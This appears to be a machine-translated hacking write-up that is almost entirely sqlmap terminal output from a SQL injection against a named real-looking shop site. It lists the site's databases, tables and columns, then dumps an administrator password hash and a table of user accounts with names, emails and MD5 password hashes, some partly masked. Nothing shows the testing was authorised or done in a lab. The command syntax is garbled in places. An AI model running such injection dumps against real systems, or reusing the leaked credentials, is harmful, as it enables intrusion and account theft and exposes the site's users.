[Email protected]:~# sqlmap-u http://dn.you.com/shop.php?id=10-v 1--dbs
Available databases [8]:
[*] Dntg
[*] Dntg2
[*] Dnweb
[*] Information_schema
[*] MySQL
[*] Performance_schema
[*] Test
[*] Ultrax
[Email protected]:~# sqlmap-u http://dn.you.com/shop.php?id=10-v 1--current-db
#当前数据库
Current database: ' Dnweb '
[Email protected]:~# sqlmap-u http://dn.you.com/shop.php?id=10-v 1--current-user
#当前数据库用户
Current User: ' [email protected] '
[Email protected]:~# sqlmap-u http://dn.you.com/shop.php?id=10-v 1--table-d "Dnweb"
#列数据库表名
Database:dnweb
[Tables]
+-----------------+
| Account |
| Admin_user |
| Base |
| Chajian |
| Chongzhi |
| Duihuan |
| Libao_jilu |
| Libao_list |
| Meirilibao |
| Meirilibao_jilu |
| Mianfei |
| Mianfei_list |
| Money_name |
| Role_dellist |
| Roleid |
| Server |
| Shop_list |
| shop_list_copy |
| Shop_tag |
| Tuiguang |
| Xiaofei |
| Zhuce |
| ZKFCN |
| Zkfcq |
| zkfwp |
+-----------------+
[Email protected]:~# sqlmap-u http://dn.you.com/shop.php?id=10-v 1--columns-t "Admin_user"
#列名
Database:dnweb
Table:admin_user
[2 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| Admin_name | varchar (20) |
| Admin_pass | varchar (32) |
+------------+-------------+
[Email protected]:~# sqlmap-u http://dn.you.com/shop.php?id=10-v 1--dump-c "Admin_name,admin_pass"-T "admin_user"-D "Dnweb"
#列数据
Database:dnweb
Table:admin_user
[1 Entry]
+------------+----------------------------------+
| Admin_name | Admin_pass |
+------------+----------------------------------+
| lok** | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+
Database:dnweb
Table:account
[Columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Createtime | datetime |
| Dlts | Int (11) |
| email | varchar (255) |
| Gold | Int (10) |
| ID | Int (10) |
| Jifen | Int (10) |
| Lastip | varchar (16) |
| Logintime | datetime |
| Lxdl | Int (11) |
| Money | Int (10) |
| Money2 | Int (10) |
| name | varchar (32) |
| Namemd5id | varchar (32) |
| password | varchar (32) |
| REGIP | varchar (16) |
| Security | varchar (32) |
| TG | Int (10) |
| TG2 | Int (10) |
| Tingyong | Int (11) |
| VIP | Int (255) |
+------------+--------------+
+-------+------------+-------------+----------------------------------+----------+
| ID | email | name | password | Security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350* | a414409798 | cee4fce6eaa87581421c296cbc0d3064 | NULL |
| 11828 | 000000 | lo*** | 670b14728ad9902aecba32e22fa4f6bd** | NULL |
| 11829 | 8888* | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL |
| 11830 | 123456 | 203412594* | cfd40caa535bb51378ab60849bb54486 | NULL |
| 11831 | 123456789 | na101* | e10adc3949ba59abbe56e057f20f883e | NULL |
| 11832 | NULL | hyt100* | 4c49c824492864666980b012bcf17d08 | NULL |
| 11833 | 32312* | hehe52121* | 0733f98f76375074a3424d5b6e8ffd68 | NULL |
| 11834 | 123456789* | fong201* | 2798BA5D7C1B4F6EEC30C9A9CAD51DCA | NULL |
| 11835 | 123456 | q50504* | e10adc3949ba59abbe56e057f20f883e | NULL |
| 11836 | 1* | wf199* | 96e79218965eb72c92a549dd5a330112 | NULL |
+-------+------------+-------------+----------------------------------+----------+
A network SQL injection vulnerability combat